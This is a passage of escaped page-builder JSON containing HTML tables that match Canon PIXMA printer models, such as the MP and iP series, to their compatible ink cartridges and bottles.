(Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td 